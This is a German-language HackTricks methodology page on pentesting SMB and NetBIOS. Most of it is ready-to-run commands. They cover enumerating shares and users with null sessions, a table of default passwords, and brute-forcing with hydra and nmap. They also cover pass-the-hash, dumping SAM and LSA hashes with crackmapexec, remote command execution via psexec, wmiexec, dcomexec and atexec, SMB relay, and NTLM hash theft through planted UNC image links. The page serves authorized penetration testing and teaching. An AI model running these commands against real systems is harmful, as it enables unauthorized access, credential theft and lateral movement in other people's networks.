139,445 - Pentesting SMB
Reading time: 22 minutes
tip
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Lernen & üben Sie Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.
Port 139
Das Network Basic Input Output System** (NetBIOS)** ist ein Softwareprotokoll, das entwickelt wurde, um Anwendungen, PCs und Desktops innerhalb eines lokalen Netzwerks (LAN) die Interaktion mit Netzwerkhardware zu ermöglichen und die Übertragung von Daten im Netzwerk zu erleichtern. Die Identifizierung und Lokalisierung von Softwareanwendungen, die in einem NetBIOS-Netzwerk betrieben werden, erfolgen über ihre NetBIOS-Namen, die bis zu 16 Zeichen lang sein können und häufig vom Computernamen abweichen. Eine NetBIOS-Sitzung zwischen zwei Anwendungen wird initiiert, wenn eine Anwendung (als Client fungierend) einen Befehl sendet, eine andere Anwendung (als Server fungierend) zu "aufrufen", wobei TCP Port 139 verwendet wird.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
Port 445
Technisch wird Port 139 als ‘NBT over IP’ bezeichnet, während Port 445 als ‘SMB over IP’ identifiziert wird. Das Akronym SMB steht für ‘Server Message Blocks’, das heutzutage auch als Common Internet File System (CIFS) bekannt ist. Als anwendungsorientiertes Netzwerkprotokoll wird SMB/CIFS hauptsächlich verwendet, um gemeinsamen Zugriff auf Dateien, Drucker und serielle Schnittstellen zu ermöglichen und verschiedene Formen der Kommunikation zwischen Knoten in einem Netzwerk zu erleichtern.
Beispielsweise wird im Kontext von Windows hervorgehoben, dass SMB direkt über TCP/IP arbeiten kann, wodurch die Notwendigkeit für NetBIOS over TCP/IP entfällt, indem Port 445 verwendet wird. Umgekehrt wird auf anderen Systemen die Verwendung von Port 139 beobachtet, was darauf hinweist, dass SMB zusammen mit NetBIOS over TCP/IP ausgeführt wird.
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
SMB
Das Server Message Block (SMB)-Protokoll, das in einem Client-Server-Modell arbeitet, ist dazu konzipiert, den Zugriff auf Dateien, Verzeichnisse und andere Netzwerkressourcen wie Drucker und Router zu regeln. Hauptsächlich innerhalb der Windows-Betriebssystemreihe verwendet, stellt SMB Abwärtskompatibilität sicher, sodass Geräte mit neueren Versionen von Microsofts Betriebssystem nahtlos mit solchen mit älteren Versionen interagieren können. Zusätzlich bietet das Samba-Projekt eine freie Softwarelösung, die die Implementierung von SMB auf Linux- und Unix-Systemen ermöglicht und so plattformübergreifende Kommunikation über SMB erleichtert.
Shares, die beliebige Teile des lokalen Dateisystems darstellen, können von einem SMB-Server bereitgestellt werden, wodurch die Hierarchie für einen Client teilweise unabhängig von der tatsächlichen Struktur des Servers sichtbar wird. Die Access Control Lists (ACLs), die die Zugriffsrechte definieren, erlauben eine feingranulare Kontrolle über Benutzerberechtigungen, einschließlich Attributen wie execute
, read
und full access
. Diese Berechtigungen können abhängig von den Shares einzelnen Benutzern oder Gruppen zugewiesen werden und unterscheiden sich von den lokal auf dem Server gesetzten Berechtigungen.
IPC$ Share
Der Zugriff auf die IPC$-Share kann über eine anonyme null session erlangt werden und erlaubt die Interaktion mit Diensten, die über named pipes angeboten werden. Das Tool enum4linux
ist hierfür nützlich. Richtig eingesetzt ermöglicht es die Beschaffung von:
- Informationen zum Betriebssystem
- Angaben zur übergeordneten Domain
- Eine Aufstellung lokaler Benutzer und Gruppen
- Informationen zu verfügbaren SMB-Shares
- Der wirksamen System-Sicherheitsrichtlinie
Diese Funktionalität ist für Netzwerkadministratoren und Sicherheitsfachleute entscheidend, um die Sicherheitslage von SMB (Server Message Block)-Diensten in einem Netzwerk zu beurteilen. enum4linux
liefert eine umfassende Sicht auf die SMB-Umgebung des Zielsystems, die wesentlich ist, um potenzielle Schwachstellen zu identifizieren und sicherzustellen, dass die SMB-Dienste ordnungsgemäß abgesichert sind.
enum4linux -a target_ip
Der obige Befehl ist ein Beispiel dafür, wie enum4linux
verwendet werden könnte, um eine vollständige enumeration gegen ein Ziel durchzuführen, das durch target_ip
angegeben ist.
Was ist NTLM
Wenn du nicht weißt, was NTLM ist oder wissen möchtest, wie es funktioniert und wie man es missbrauchen kann, findest du diese Seite über NTLM sehr interessant, auf der erklärt wird, wie dieses Protokoll funktioniert und wie du es ausnutzen kannst:
Server Enumeration
Scan ein Netzwerk, um nach Hosts zu suchen:
nbtscan -r 192.168.0.1/24
SMB-Server-Version
Um nach möglichen Exploits für die SMB-Version zu suchen, ist es wichtig zu wissen, welche Version verwendet wird. Wenn diese Information in den anderen verwendeten Tools nicht erscheint, können Sie:
- Verwenden Sie das MSF auxiliary module
**auxiliary/scanner/smb/smb_version**
- Oder dieses Skript:
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
Exploit suchen
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
Mögliche Anmeldeinformationen
Benutzername(n) | Häufige Passwörter |
---|---|
(leer) | (leer) |
guest | (leer) |
Administrator, admin | (leer), password, administrator, admin |
arcserve | arcserve, backup |
tivoli, tmersrvd | tivoli, tmersrvd, admin |
backupexec, backup | backupexec, backup, arcada |
test, lab, demo | password, test, lab, demo |
Brute Force
Informationen zur SMB-Umgebung
Informationen beschaffen
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
Benutzer, Gruppen & angemeldete Benutzer auflisten
Diese Informationen sollten bereits durch enum4linux und enum4linux-ng gesammelt worden sein.
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
Lokale Benutzer auflisten
lookupsid.py -no-pass hostname.local
Einzeiler
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Metasploit - Lokale Benutzer auflisten
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
Aufzählung von LSARPC und SAMR rpcclient
GUI-Verbindung unter Linux
Im Terminal:
xdg-open smb://cascade.htb/
Im Dateimanager-Fenster (nautilus, thunar, usw.)
smb://friendzone.htb/general/
Aufzählung freigegebener Ordner
Freigegebene Ordner auflisten
Es wird immer empfohlen zu prüfen, ob Sie auf irgendetwas zugreifen können. Wenn Sie keine Anmeldeinformationen haben, versuchen Sie die Verwendung von null credentials/guest user.
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
Verbinden/Auflisten eines freigegebenen Ordners
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Manuell Windows-Shares auflisten und verbinden
Es kann sein, dass du daran gehindert wirst, die Shares des Host-Rechners anzuzeigen; beim Versuch, sie aufzulisten, sieht es so aus, als gäbe es keine Shares, zu denen du dich verbinden könntest. Deshalb lohnt es sich, kurz zu versuchen, manuell eine Verbindung zu einem Share herzustellen. Um die Shares manuell zu enumerieren, solltest du auf Antworten wie NT_STATUS_ACCESS_DENIED und NT_STATUS_BAD_NETWORK_NAME achten, wenn du eine gültige Sitzung verwendest (z. B. null session oder gültige Anmeldedaten). Diese können darauf hinweisen, ob das Share existiert und du keinen Zugriff darauf hast oder das Share überhaupt nicht existiert.
Häufige Share-Namen für Windows-Ziele sind
- C$
- D$
- ADMIN$
- IPC$
- PRINT$
- FAX$
- SYSVOL
- NETLOGON
(Übliche Share-Namen aus Network Security Assessment 3rd edition)
Du kannst versuchen, dich mit ihnen zu verbinden, indem du folgenden Befehl verwendest
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
oder dieses script (mit einer null session)
#/bin/bash
ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done
Beispiele
smbclient -U '%' -N \\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
Freigaben unter Windows auflisten / ohne Drittanbieter-Tools
PowerShell
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
CMD-Konsole
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
MMC Snap-in (grafisch)
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
explorer.exe (grafisch): \\<ip>\
eingeben, um die verfügbaren nicht versteckten Freigaben zu sehen.
Ein freigegebenes Verzeichnis einbinden
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
Dateien herunterladen
Lesen Sie die vorherigen Abschnitte, um zu lernen, wie man sich mit credentials/Pass-the-Hash verbindet.
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
Befehle:
- mask: spezifiziert die Maske, die verwendet wird, um Dateien im Verzeichnis zu filtern (z. B. "" für alle Dateien)
- recurse: schaltet Rekursion ein (Standard: aus)
- prompt: schaltet die Abfrage nach Dateinamen aus (Standard: ein)
- mget: kopiert alle Dateien, die der Maske entsprechen, vom Host auf die Client-Maschine
(Informationen aus der manpage von smbclient)
Suche nach freigegebenen Ordnern in der Domain
Snaffler.exe -s -d domain.local -o snaffler.log -v data
- CrackMapExec spider.
-M spider_plus [--share <share_name>]
--pattern txt
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
Besonders interessant von Shares sind die Dateien namens Registry.xml
, da sie may contain passwords für Benutzer enthalten können, die mit autologon via Group Policy konfiguriert wurden. Oder web.config
-Dateien, da sie credentials enthalten.
tip
Der SYSVOL share ist für alle authentifizierten Benutzer in der Domain lesbar. Dort können Sie viele verschiedene batch-, VBScript- und PowerShell-Skripte finden.
Sie sollten die Skripte darin überprüfen, da Sie möglicherweise sensible Informationen wie passwords finden.
Registry auslesen
Sie können möglicherweise die Registry auslesen, indem Sie einige entdeckte credentials verwenden. Impacket reg.py
ermöglicht es Ihnen, dies zu versuchen:
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
Post-Exploitation
Die Standardkonfiguration eines Samba-Servers befindet sich normalerweise in /etc/samba/smb.conf
und kann einige gefährliche Konfigurationen enthalten:
Setting | Beschreibung |
---|---|
browseable = yes | Erlaubt das Auflisten verfügbarer Freigaben im aktuellen Share? |
read only = no | Verhindert die Erstellung und Änderung von Dateien? |
writable = yes | Ermöglicht Benutzern das Erstellen und Ändern von Dateien? |
guest ok = yes | Ermöglicht die Verbindung zum Dienst ohne Verwendung eines Passworts? |
enable privileges = yes | Beachtet Berechtigungen, die bestimmten SIDs zugewiesen sind? |
create mask = 0777 | Welche Berechtigungen müssen neu erstellten Dateien zugewiesen werden? |
directory mask = 0777 | Welche Berechtigungen müssen neu erstellten Verzeichnissen zugewiesen werden? |
logon script = script.sh | Welches Skript muss beim Login des Benutzers ausgeführt werden? |
magic script = script.sh | Welches Skript sollte ausgeführt werden, wenn das Skript geschlossen wird? |
magic output = script.out | Wo die Ausgabe des magic script gespeichert werden muss? |
Der Befehl smbstatus
liefert Informationen über den Server und darüber, wer verbunden ist.
Authentifizierung mit Kerberos
Sie können sich gegenüber Kerberos mit den Tools smbclient und rpcclient authentifizieren:
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
In Kerberos-only-Umgebungen (NTLM deaktiviert) können NTLM-Versuche gegen SMB STATUS_NOT_SUPPORTED
zurückgeben. Behebe häufige Kerberos-Probleme und erzwinge Kerberos-Authentifizierung:
# sync clock to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# use Kerberos with tooling (reads your TGT from ccache)
netexec smb <dc.fqdn> -k
Für eine vollständige Client-Einrichtung (krb5.conf-Generierung, kinit, SSH GSSAPI/SPN-Hinweise) siehe:
88tcp/udp - Pentesting Kerberos
Befehle ausführen
crackmapexec
crackmapexec kann Befehle ausführen, indem es eines der mmcexec, smbexec, atexec, wmiexec ausnutzt, wobei wmiexec die Standardmethode ist. Welche Option verwendet werden soll, geben Sie mit dem Parameter --exec-method
an:
apt-get install crackmapexec
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
psexec/smbexec
Beide Optionen werden einen neuen Dienst erstellen (mithilfe von \pipe\svcctl über SMB) auf dem Zielrechner und ihn verwenden, um etwas auszuführen (psexec wird eine ausführbare Datei auf das ADMIN$ share upload und smbexec wird auf cmd.exe/powershell.exe verweisen und in die Argumente das payload setzen --file-less technique--).
Mehr Infos über psexec und smbexec.
In kali befindet es sich unter /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
Mit dem Parameter -k
kannst du dich gegen kerberos statt NTLM authentifizieren.
wmiexec/dcomexec
Führe heimlich eine Kommando-Shell aus, ohne die Festplatte zu berühren oder einen neuen Service zu starten, indem du DCOM über Port 135.
In kali befindet es sich in /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Mit dem Parameter -k
kannst du dich gegen kerberos statt NTLM authentifizieren.
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
AtExec
Befehle über den Task Scheduler ausführen (mithilfe von \pipe\atsvc über SMB).
Unter kali befindet es sich in /usr/share/doc/python3-impacket/examples/
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
Impacket Referenz
https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/
ksmbd Angriffsfläche und SMB2/SMB3 protocol fuzzing (syzkaller)
Ksmbd Attack Surface And Fuzzing Syzkaller
Bruteforce Benutzer credentials
Dies wird nicht empfohlen — ein Konto könnte gesperrt werden, wenn die maximal erlaubten Versuche überschritten werden.
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
SMB relay attack
Dieser Angriff verwendet das Responder toolkit, um capture SMB authentication sessions in einem internen Netzwerk abzufangen und relays sie an eine target machine. Wenn die Authentifizierung session is successful, wird automatisch eine system shell geöffnet.
More information about this attack here.
SMB-Trap
Die Windows-Bibliothek URLMon.dll versucht automatisch, sich beim Host zu authentifizieren, wenn eine Seite versucht, Inhalte über SMB zu laden, zum Beispiel: img src="\\10.10.10.10\path\image.jpg"
Dies geschieht bei den folgenden Funktionen:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
Die von einigen Browsern und Tools (wie Skype) verwendet werden.
SMBTrap using MitMf
NTLM Theft
Ähnlich wie beim SMB Trapping kann das Ablegen bösartiger Dateien auf einem Zielsystem (z. B. über SMB) eine SMB-Authentifizierungsanfrage auslösen, wodurch der NetNTLMv2-Hash mit einem Tool wie Responder abgefangen werden kann. Der Hash kann anschließend offline geknackt oder in einem SMB relay attack verwendet werden.
HackTricks Automatische Befehle
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
Referenzen
- NetExec (CME) wiki – Kerberos Verwendung
- Pentesting Kerberos (88) – Client-Einrichtung und Fehlerbehebung
- 0xdf – HTB: TheFrizz
tip
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Lernen & üben Sie Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.